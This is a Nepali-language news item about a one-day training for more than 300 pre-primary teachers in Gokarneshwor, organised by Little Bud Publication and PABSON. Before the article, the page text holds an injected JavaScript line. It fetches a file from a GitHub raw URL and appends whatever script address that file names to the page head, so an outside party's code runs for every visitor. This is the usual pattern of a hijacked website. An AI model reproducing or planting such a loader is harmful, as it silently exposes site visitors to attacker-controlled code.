;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौं। पौष २
लिटल बड पब्लिकेशनको आयोजनामा र गोकर्णेश्वर प्याब्सनको संयोजकत्वमा पूर्व प्राथामिक तह शिक्षक शिक्षिका तालिम सम्पन्न गरेको छ। प्याब्सन गोकर्णेश्वरका अध्यक्ष दुर्गानाथ शिवाकोटी (डी.एन शिवाकोटी) को अध्यक्षमा सो कार्यक्रम भएको थियो।
गोकर्णेश्वर नगरपालिका जोरपाटीको पिस ब्याङकेटमा तालिम आयोजना गरिएको थियो। तालिममा नगरपालिका भित्रका संस्थागत विद्यालय गरी करिब ३०० जना भन्दा बढी शिक्षक शिक्षिकाहरुको उपस्थिति रहेको थियो।
विद्यालयको शिक्षाको गुणस्तर कसरी बढाउने, विद्यार्थीहरुलाई पढाइमा कसरी ध्यान लगाउने भन्ने विषयमा अनुभवी तथा दक्ष प्रशिक्षकहरु द्वारा तालिम प्रदान गरिएको थियो।
एक दिन भरी रहेको सो कार्यक्रममा उद्घाटन सत्र गोकर्णेश्वर नगरपालिका मेयर दिपक रिसालले पानसमा दीप प्रज्वलन गरी उद्घाटन गरेका थिए। साथमा काठमाडौं जिल्ला प्याब्सनका प्रमुख सल्लाहकार हरिकृष्ण श्रेष्ठ, गोकर्णेश्वर नगरपालिका शिक्षा युवा तथा खेलकुद शाखाका प्रमुख डण्डपाणी शर्मा, काठमाडौं जिल्ला प्याब्सनका सल्लाहकार रामचन्द्र देवकोटा, काठमाडौं जिल्ला प्याब्सनका सचिव सुदर्शन थापा, काठमाडौं जिल्ला प्याब्सनका सह सचिव ओम ढकाल, काठमाडौं जिल्ला प्याब्सनका सदस्य तथा निसानका अध्यक्ष सौर्य आचार्य, लगायतका व्यक्तिहरूक उपस्थिति रहेको थियो।
उक्त तालिम समय सापेक्ष र अति उपयोगी भएको अध्यक्ष दुर्गानाथ शिवाकोटीको भनाई छ।
फेसबुक प्रतिक्रियाहरु